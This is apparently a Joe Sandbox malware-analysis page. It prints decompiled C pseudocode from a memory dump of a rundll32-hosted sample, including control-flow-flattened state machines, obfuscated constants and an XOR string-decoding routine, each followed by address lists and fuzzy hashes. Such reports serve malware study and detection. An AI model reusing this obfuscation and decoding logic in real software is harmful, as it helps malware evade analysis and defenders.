						_t97 =  &_v520;
						__eflags = _t117 - _t97;
						if(_t117 <= _t97) {
							break;
						}
						__eflags =  *_t117 - 0x5c;
						if( *_t117 != 0x5c) {
							L10:
							_t117 = _t117 - 2;
							__eflags = _t117;
							continue;
						}
						_t85 =  &_v544;
						 *_t85 = _v544 - 1;
						__eflags =  *_t85;
						if( *_t85 == 0) {
							__eflags = _t117;
							L14:
							_t105 = 0x2c7b739;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t105 - 0x787a9f3;
				} while (__eflags != 0);
				return _t97;
			}






















                                                                                                                      0x0017e86a
                                                                                                                      0x0017e870
                                                                                                                      0x0017e87a
                                                                                                                      0x0017e882
                                                                                                                      0x0017e891
                                                                                                                      0x0017e89e
                                                                                                                      0x0017e8a7
                                                                                                                      0x0017e8af
                                                                                                                      0x0017e8bc
                                                                                                                      0x0017e8c0
                                                                                                                      0x0017e8c5
                                                                                                                      0x0017e8cd
                                                                                                                      0x0017e8da
                                                                                                                      0x0017e8de
                                                                                                                      0x0017e8e6
                                                                                                                      0x0017e8f3
                                                                                                                      0x0017e8f7
                                                                                                                      0x0017e8ff
                                                                                                                      0x0017e907
                                                                                                                      0x0017e90f
                                                                                                                      0x0017e914
                                                                                                                      0x0017e91c
                                                                                                                      0x0017e924
                                                                                                                      0x0017e92c
                                                                                                                      0x0017e931
                                                                                                                      0x0017e939
                                                                                                                      0x0017e941
                                                                                                                      0x0017e946
                                                                                                                      0x0017e94e
                                                                                                                      0x0017e956
                                                                                                                      0x0017e95e
                                                                                                                      0x0017e966
                                                                                                                      0x0017e96e
                                                                                                                      0x0017e97f
                                                                                                                      0x0017e983
                                                                                                                      0x0017e98b
                                                                                                                      0x0017e993
                                                                                                                      0x0017e99b
                                                                                                                      0x0017e9a0
                                                                                                                      0x0017e9a4
                                                                                                                      0x0017e9ac
                                                                                                                      0x0017e9ac
                                                                                                                      0x0017e9b2
                                                                                                                      0x0017ea53
                                                                                                                      0x0017ea5a
                                                                                                                      0x00000000
                                                                                                                      0x0017ea6d
                                                                                                                      0x0017e9be
                                                                                                                      0x0017e9e1
                                                                                                                      0x00000000
                                                                                                                      0x0017e9e1
                                                                                                                      0x0017e9c0
                                                                                                                      0x0017e9c2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e9d5
                                                                                                                      0x0017e9da
                                                                                                                      0x0017e9dd
                                                                                                                      0x0017e9dd
                                                                                                                      0x0017e9e5
                                                                                                                      0x0017e9f1
                                                                                                                      0x0017e9f9
                                                                                                                      0x0017ea12
                                                                                                                      0x0017ea1b
                                                                                                                      0x0017ea1e
                                                                                                                      0x0017ea32
                                                                                                                      0x0017ea32
                                                                                                                      0x0017ea36
                                                                                                                      0x0017ea38
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017ea23
                                                                                                                      0x0017ea27
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea2f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea2d
                                                                                                                      0x0017ea3c
                                                                                                                      0x0017ea3f
                                                                                                                      0x0017ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea2d
                                                                                                                      0x00000000
                                                                                                                      0x0017ea41
                                                                                                                      0x0017ea41
                                                                                                                      0x0017ea41
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: c0cee2f80a81a1684c47bdc2085d9f3068923399ad0c4a311bb5de24e51d5c3c
                                                                                                                      • Instruction ID: 34387c71a654fb63ebfe9cd95c499e8d7c1d8167e1c1746c5bf3a2c0f9d8c5c0
                                                                                                                      • Opcode Fuzzy Hash: c0cee2f80a81a1684c47bdc2085d9f3068923399ad0c4a311bb5de24e51d5c3c
                                                                                                                      • Instruction Fuzzy Hash: CB5134715083419BC798DF24C58542FBBF4FBC8758F909A5DF99A96220D370DA49CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00180D33 Relevance: 1.4, Strings: 1, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00180D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t64;
				void* _t81;
				void* _t85;
				signed int _t94;
				signed int _t95;
				void* _t97;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0017CF25(_t64);
				_v20 = 0xc35745;
				_t97 = 0;
				_t81 = 0xe709e41;
				_t94 = 0x4c;
				_v20 = _v20 / _t94;
				_v20 = _v20 ^ 0x00058dee;
				_v24 = 0xf1d8fd;
				_v24 = _v24 + 0xffffe7cd;
				_v24 = _v24 + 0xffff1b1a;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x0dbd879b;
				_v28 = 0xdb2a24;
				_v28 = _v28 + 0x4b2b;
				_v28 = _v28 | 0xa0f26509;
				_v28 = _v28 + 0x79c0;
				_v28 = _v28 ^ 0xa0fe0b2f;
				_v4 = 0xb750f2;
				_v4 = _v4 >> 0xe;
				_v4 = _v4 ^ 0x000727f7;
				_v8 = 0x72e718;
				_t95 = 0x6b;
				_v8 = _v8 / _t95;
				_v8 = _v8 ^ 0x00056d3a;
				_v12 = 0x47eeb9;
				_v12 = _v12 + 0xffffe987;
				_v12 = _v12 ^ 0x0043781c;
				_v16 = 0xdf1994;
				_v16 = _v16 + 0xffff4376;
				_v16 = _v16 ^ 0x00d54791;
				do {
					while(_t81 != 0x3b92be8) {
						if(_t81 == 0x73b901c) {
							E00193672();
							_t81 = 0xe212545;
							continue;
						} else {
							if(_t81 == 0x9bcb632) {
								if(E0018ACD3(_a8) != 0) {
									_t97 = 1;
								} else {
									_t81 = 0x73b901c;
									continue;
								}
							} else {
								if(_t81 == 0xe212545) {
									E001768DE(_v4, _v8, _v12, _v16,  *0x195c9c);
								} else {
									if(_t81 != 0xe709e41) {
										goto L13;
									} else {
										_push(_t81);
										_push(_t81);
										_t85 = 0x60;
										 *0x195c9c = E00183512(_t85);
										_t81 = 0x3b92be8;
										continue;
									}
								}
							}
						}
						L17:
						return _t97;
					}
					if(E00179A7D(_a12) == 0) {
						_t81 = 0xe212545;
						goto L13;
					} else {
						_t81 = 0x9bcb632;
						continue;
					}
					goto L17;
					L13:
				} while (_t81 != 0xf0e3ed);
				goto L17;
			}
















                                                                                                                      0x00180d3a
                                                                                                                      0x00180d3e
                                                                                                                      0x00180d42
                                                                                                                      0x00180d47
                                                                                                                      0x00180d48
                                                                                                                      0x00180d4d
                                                                                                                      0x00180d5e
                                                                                                                      0x00180d60
                                                                                                                      0x00180d71
                                                                                                                      0x00180d76
                                                                                                                      0x00180d7c
                                                                                                                      0x00180d84
                                                                                                                      0x00180d8c
                                                                                                                      0x00180d94
                                                                                                                      0x00180d9c
                                                                                                                      0x00180da1
                                                                                                                      0x00180da9
                                                                                                                      0x00180db1
                                                                                                                      0x00180db9
                                                                                                                      0x00180dc1
                                                                                                                      0x00180dc9
                                                                                                                      0x00180dd1
                                                                                                                      0x00180dd9
                                                                                                                      0x00180dde
                                                                                                                      0x00180de6
                                                                                                                      0x00180df2
                                                                                                                      0x00180dfa
                                                                                                                      0x00180dfe
                                                                                                                      0x00180e06
                                                                                                                      0x00180e0e
                                                                                                                      0x00180e16
                                                                                                                      0x00180e1e
                                                                                                                      0x00180e26
                                                                                                                      0x00180e2e
                                                                                                                      0x00180e36
                                                                                                                      0x00180e36
                                                                                                                      0x00180e40
                                                                                                                      0x00180e87
                                                                                                                      0x00180e8c
                                                                                                                      0x00000000
                                                                                                                      0x00180e42
                                                                                                                      0x00180e44
                                                                                                                      0x00180e81
                                                                                                                      0x00180ecf
                                                                                                                      0x00180e83
                                                                                                                      0x00180e83
                                                                                                                      0x00000000
                                                                                                                      0x00180e83
                                                                                                                      0x00180e46
                                                                                                                      0x00180e48
                                                                                                                      0x00180ec3
                                                                                                                      0x00180e4a
                                                                                                                      0x00180e50
                                                                                                                      0x00000000
                                                                                                                      0x00180e52
                                                                                                                      0x00180e5e
                                                                                                                      0x00180e5f
                                                                                                                      0x00180e62
                                                                                                                      0x00180e6a
                                                                                                                      0x00180e6f
                                                                                                                      0x00000000
                                                                                                                      0x00180e6f
                                                                                                                      0x00180e50
                                                                                                                      0x00180e48
                                                                                                                      0x00180e44
                                                                                                                      0x00180ed1
                                                                                                                      0x00180ed9
                                                                                                                      0x00180ed9
                                                                                                                      0x00180e9b
                                                                                                                      0x00180ea1
                                                                                                                      0x00000000
                                                                                                                      0x00180e9d
                                                                                                                      0x00180e9d
                                                                                                                      0x00000000
                                                                                                                      0x00180e9d
                                                                                                                      0x00000000
                                                                                                                      0x00180ea3
                                                                                                                      0x00180ea3
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: fa304b436ff796c5d4f257d5a9ba8273cb8b3f26ea76a38e1695c0133bf9e532
                                                                                                                      • Instruction ID: f12e3336cd127f8d374f45d51a3e3b8a8d4630ca1900b3360a2d2b69de95e5d8
                                                                                                                      • Opcode Fuzzy Hash: fa304b436ff796c5d4f257d5a9ba8273cb8b3f26ea76a38e1695c0133bf9e532
                                                                                                                      • Instruction Fuzzy Hash: 3541EF72608301DBD799EF24C84552FBBE2EBE8318F508E1DF59656260D770CA49CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017AB66 Relevance: 1.3, Strings: 1, Instructions: 93COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0017AB66(void* __ecx, void* __edx, void* __eflags) {
				void* _t42;
				signed int _t46;
				short* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t74;
				unsigned int _t75;
				unsigned int _t76;
				short* _t79;
				signed int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				short _t92;
				void* _t94;
				void* _t95;

				_t82 =  *(_t94 + 0x1c);
				_push( *(_t94 + 0x28));
				_push( *(_t94 + 0x28));
				_push(_t82);
				_push(__ecx);
				E0017CF25(_t42);
				 *(_t94 + 0x24) = 0xc8fa9a;
				_t80 =  &(_t82[1]);
				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
				 *(_t94 + 0x34) = 0x8cac1;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
				 *(_t94 + 0x20) = 0x3c356c;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
				_t66 =  *_t82;
				_t81 =  &(_t80[1]);
				_t46 =  *_t80 ^ _t66;
				 *(_t94 + 0x28) = _t66;
				 *(_t94 + 0x2c) = _t46;
				_t24 = _t46 + 1; // 0x3c356d
				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
				_t95 = _t94 + 0xc;
				_t63 = E00183512(_t84 + _t84);
				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
				if(_t63 != 0) {
					_t92 = 0;
					_t79 = _t63;
					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
					if(_t90 != 0) {
						_t64 =  *(_t95 + 0x18);
						do {
							_t74 =  *_t81;
							_t81 =  &(_t81[1]);
							_t75 = _t74 ^ _t64;
							 *_t79 = _t75 & 0x000000ff;
							_t79 = _t79 + 8;
							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
							_t76 = _t75 >> 0x10;
							_t92 = _t92 + 1;
							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
						} while (_t92 < _t90);
						_t63 =  *((intOrPtr*)(_t95 + 0x24));
					}
					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
				}
				return _t63;
			}




















                                                                                                                      0x0017ab6b
                                                                                                                      0x0017ab70
                                                                                                                      0x0017ab74
                                                                                                                      0x0017ab78
                                                                                                                      0x0017ab7a
                                                                                                                      0x0017ab7b
                                                                                                                      0x0017ab80
                                                                                                                      0x0017ab88
                                                                                                                      0x0017ab8b
                                                                                                                      0x0017ab93
                                                                                                                      0x0017ab9b
                                                                                                                      0x0017aba3
                                                                                                                      0x0017abab
                                                                                                                      0x0017abb3
                                                                                                                      0x0017abc0
                                                                                                                      0x0017abc4
                                                                                                                      0x0017abcc
                                                                                                                      0x0017abd4
                                                                                                                      0x0017abd8
                                                                                                                      0x0017abdb
                                                                                                                      0x0017abdd
                                                                                                                      0x0017abe1
                                                                                                                      0x0017abe5
                                                                                                                      0x0017abf5
                                                                                                                      0x0017ac00
                                                                                                                      0x0017ac0f
                                                                                                                      0x0017ac11
                                                                                                                      0x0017ac19
                                                                                                                      0x0017ac21
                                                                                                                      0x0017ac23
                                                                                                                      0x0017ac34
                                                                                                                      0x0017ac39
                                                                                                                      0x0017ac3b
                                                                                                                      0x0017ac3f
                                                                                                                      0x0017ac3f
                                                                                                                      0x0017ac41
                                                                                                                      0x0017ac44
                                                                                                                      0x0017ac49
                                                                                                                      0x0017ac51
                                                                                                                      0x0017ac57
                                                                                                                      0x0017ac5b
                                                                                                                      0x0017ac64
                                                                                                                      0x0017ac65
                                                                                                                      0x0017ac6c
                                                                                                                      0x0017ac70
                                                                                                                      0x0017ac74
                                                                                                                      0x0017ac74
                                                                                                                      0x0017ac7f
                                                                                                                      0x0017ac7f
                                                                                                                      0x0017ac8b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: 6b0ad609b8cbef9db2e460dfb43ff31e1c459dc74e6199dfb61229c1d9851022
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: AB317C726097119BC714DF28C48546AFBE0FF88728F454B2DF889A7250D774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018109E Relevance: 1.3, Strings: 1, Instructions: 87COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018109E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t76;
				void* _t82;
				void* _t83;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t99 =  &_v28;
				_v24 = 0xd283c4;
				_v24 = _v24 >> 8;
				_v24 = _v24 << 9;
				_t83 = __ecx;
				_t96 = 0;
				_t85 = 0x2d;
				_v24 = _v24 / _t85;
				_v24 = _v24 ^ 0x0004da81;
				_t97 = 0xc7350e4;
				_v16 = 0x64139d;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00062b71;
				_v28 = 0xade301;
				_v28 = _v28 ^ 0x8f618bae;
				_v28 = _v28 >> 4;
				_t86 = 0x7e;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x001433c5;
				_v20 = 0x6fd8b7;
				_v20 = _v20 << 5;
				_t87 = 0x39;
				_v20 = _v20 / _t87;
				_v20 = _v20 ^ 0x003ef69f;
				_v4 = 0x5f989c;
				_v4 = _v4 + 0xda74;
				_v4 = _v4 ^ 0x006bc492;
				_v12 = 0x987d41;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0x3c41;
				_v12 = _v12 ^ 0x30fa219f;
				_v8 = 0x945ab1;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x002dcc5b;
				do {
					while(_t97 != 0xa0feddc) {
						if(_t97 == 0xc7350e4) {
							_t97 = 0xf55d56d;
							continue;
						} else {
							if(_t97 == 0xf55d56d) {
								_t82 = E0018274F();
								_t99 = _t99 - 0xc + 0xc;
								_t97 = 0xa0feddc;
								_t96 = _t96 + _t82;
								continue;
							}
						}
						goto L7;
					}
					_t76 = E0017B782(_t83 + 4, _v4, _v12, _v8);
					_t99 =  &(_t99[2]);
					_t97 = 0x490b4c9;
					_t96 = _t96 + _t76;
					L7:
				} while (_t97 != 0x490b4c9);
				return _t96;
			}



















                                                                                                                      0x0018109e
                                                                                                                      0x001810a1
                                                                                                                      0x001810ab
                                                                                                                      0x001810b0
                                                                                                                      0x001810bf
                                                                                                                      0x001810c1
                                                                                                                      0x001810c3
                                                                                                                      0x001810c8
                                                                                                                      0x001810ce
                                                                                                                      0x001810d6
                                                                                                                      0x001810db
                                                                                                                      0x001810e8
                                                                                                                      0x001810ed
                                                                                                                      0x001810f2
                                                                                                                      0x001810fa
                                                                                                                      0x00181102
                                                                                                                      0x0018110a
                                                                                                                      0x00181113
                                                                                                                      0x00181118
                                                                                                                      0x0018111e
                                                                                                                      0x00181126
                                                                                                                      0x0018112e
                                                                                                                      0x00181137
                                                                                                                      0x0018113a
                                                                                                                      0x0018113e
                                                                                                                      0x00181146
                                                                                                                      0x0018114e
                                                                                                                      0x00181156
                                                                                                                      0x0018115e
                                                                                                                      0x00181166
                                                                                                                      0x0018116b
                                                                                                                      0x00181173
                                                                                                                      0x0018117b
                                                                                                                      0x00181183
                                                                                                                      0x00181188
                                                                                                                      0x00181190
                                                                                                                      0x00181190
                                                                                                                      0x0018119e
                                                                                                                      0x001811c8
                                                                                                                      0x00000000
                                                                                                                      0x001811a0
                                                                                                                      0x001811a2
                                                                                                                      0x001811b7
                                                                                                                      0x001811bc
                                                                                                                      0x001811bf
                                                                                                                      0x001811c4
                                                                                                                      0x00000000
                                                                                                                      0x001811c4
                                                                                                                      0x001811a2
                                                                                                                      0x00000000
                                                                                                                      0x0018119e
                                                                                                                      0x001811db
                                                                                                                      0x001811e0
                                                                                                                      0x001811e3
                                                                                                                      0x001811e8
                                                                                                                      0x001811ea
                                                                                                                      0x001811ea
                                                                                                                      0x001811fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: 303598970bb7164440f269743456dacc993a9ed279e13203cd6e0a34fd3de25f
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 93318C729083019FC304DE25D84941BBBE1FBE4B58F158A2DF588AB260D3B5DE08CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00178650 Relevance: 1.3, Strings: 1, Instructions: 86COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E00178650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t83;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t118;
				signed int _t119;

				_push(_a4);
				_t118 = __edx;
				_push(__edx);
				E0017CF25(_t83);
				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v40 = 0x27bdd4;
				_v24 = 0x769f2a;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e6321c;
				_v8 = 0xfef45c;
				_t102 = 0x31;
				_v8 = _v8 / _t102;
				_v8 = _v8 | 0xf1ae833d;
				_v8 = _v8 ^ 0x9231f40a;
				_v8 = _v8 ^ 0x6392d2fe;
				_v16 = 0x3d43fb;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x97e6d5b2;
				_v16 = _v16 ^ 0x97eefe03;
				_v12 = 0x33c712;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0x2d9c;
				_t103 = 0x16;
				_v12 = _v12 / _t103;
				_v12 = _v12 ^ 0x00054cf8;
				_v28 = 0xb0e606;
				_v28 = _v28 | 0xfcdd39f2;
				_v28 = _v28 * 0x19;
				_v28 = _v28 ^ 0xb4c190eb;
				E00175AE2(_t103);
				_v24 = 0x8c0b06;
				_v24 = _v24 + 0x3875;
				_v24 = _v24 ^ 0xc8b8cfa1;
				_v24 = _v24 ^ 0xc8348cde;
				_v20 = 0xa003e6;
				_t104 = 0x69;
				_v20 = _v20 / _t104;
				_t105 = 0x51;
				_v20 = _v20 / _t105;
				_v20 = _v20 ^ 0x000004c1;
				_t119 = E0017EF71(_v24, _v20);
				_push(_t119);
				_push(_v28);
				_push(_t118);
				E00175A07(1, _v12);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}



















                                                                                                                      0x00178658
                                                                                                                      0x0017865b
                                                                                                                      0x0017865d
                                                                                                                      0x0017865f
                                                                                                                      0x00178664
                                                                                                                      0x0017866a
                                                                                                                      0x0017866e
                                                                                                                      0x00178675
                                                                                                                      0x0017867c
                                                                                                                      0x0017867f
                                                                                                                      0x00178686
                                                                                                                      0x00178692
                                                                                                                      0x00178697
                                                                                                                      0x0017869c
                                                                                                                      0x001786a3
                                                                                                                      0x001786aa
                                                                                                                      0x001786b1
                                                                                                                      0x001786b8
                                                                                                                      0x001786bc
                                                                                                                      0x001786c3
                                                                                                                      0x001786ca
                                                                                                                      0x001786d1
                                                                                                                      0x001786d5
                                                                                                                      0x001786df
                                                                                                                      0x001786e2
                                                                                                                      0x001786e5
                                                                                                                      0x001786ec
                                                                                                                      0x001786f3
                                                                                                                      0x001786fe
                                                                                                                      0x00178701
                                                                                                                      0x0017870b
                                                                                                                      0x00178710
                                                                                                                      0x00178719
                                                                                                                      0x00178720
                                                                                                                      0x00178727
                                                                                                                      0x0017872e
                                                                                                                      0x0017873a
                                                                                                                      0x0017873f
                                                                                                                      0x00178747
                                                                                                                      0x0017874a
                                                                                                                      0x0017874d
                                                                                                                      0x00178765
                                                                                                                      0x00178769
                                                                                                                      0x0017876a
                                                                                                                      0x00178771
                                                                                                                      0x00178772
                                                                                                                      0x0017877c
                                                                                                                      0x00178785

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: 0f1727d06a53580a55a51100f84a42b46455b5f2fbfc863dd68ec8cf4959fd66
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: AC311371D00209EBDB09CFA5C98AAEFBBB2FF44314F208099E515B62A0D7B55B54CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017EC9B Relevance: 1.3, Strings: 1, Instructions: 84COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0017EC9B(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t99;
				intOrPtr _t104;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_v52 = _v52 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v56 = 0x52d5fa;
				_v32 = 0xd2ae86;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x0000dff8;
				_v8 = 0x945d31;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0xfea629bb;
				_t114 = __edx;
				_v8 = _v8 * 0x68;
				_v8 = _v8 ^ 0x739e55b5;
				_v16 = 0xe343a6;
				_v16 = _v16 + 0xffffaeee;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0x5e55869e;
				_v28 = 0xa35055;
				_v28 = _v28 ^ 0xccdb3a8a;
				_v28 = _v28 ^ 0xcc747f7c;
				_v12 = 0x417a71;
				_t115 = 0xc;
				_v12 = _v12 / _t115;
				_v12 = _v12 + 0xffffd743;
				_v12 = _v12 ^ 0x254bb370;
				_v12 = _v12 ^ 0x25474737;
				_v36 = 0x5ce014;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0xe70ab788;
				_v20 = 0x24db01;
				_t116 = 0x63;
				_v20 = _v20 * 0x3c;
				_v20 = _v20 + 0xe28f;
				_v20 = _v20 ^ 0x08ab7f21;
				_v44 = 0x4977db;
				_v44 = _v44 * 0x38;
				_v44 = _v44 ^ 0x1015e45e;
				_v24 = 0xa0027c;
				_v24 = _v24 | 0xcfe9110c;
				_v24 = _v24 + 0xffff4bac;
				_v24 = _v24 ^ 0xcfe5f801;
				_v40 = 0x81bf9e;
				_v40 = _v40 / _t116;
				_v40 = _v40 ^ 0x000d137a;
				_push(_v28);
				_push(_v16);
				_push(__ecx);
				_t99 = E001907D7(_v12, _v36, E0017AB66(_v32, _v8, _v40), _v20);
				_t104 =  *0x195c8c; // 0x0
				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
				return E0017AE03(_v44, _v24, _v40, _t98);
			}





















                                                                                                                      0x0017eca1
                                                                                                                      0x0017eca5
                                                                                                                      0x0017eca9
                                                                                                                      0x0017ecb0
                                                                                                                      0x0017ecb7
                                                                                                                      0x0017ecbb
                                                                                                                      0x0017ecc2
                                                                                                                      0x0017ecc9
                                                                                                                      0x0017eccd
                                                                                                                      0x0017ecdc
                                                                                                                      0x0017ece0
                                                                                                                      0x0017ece3
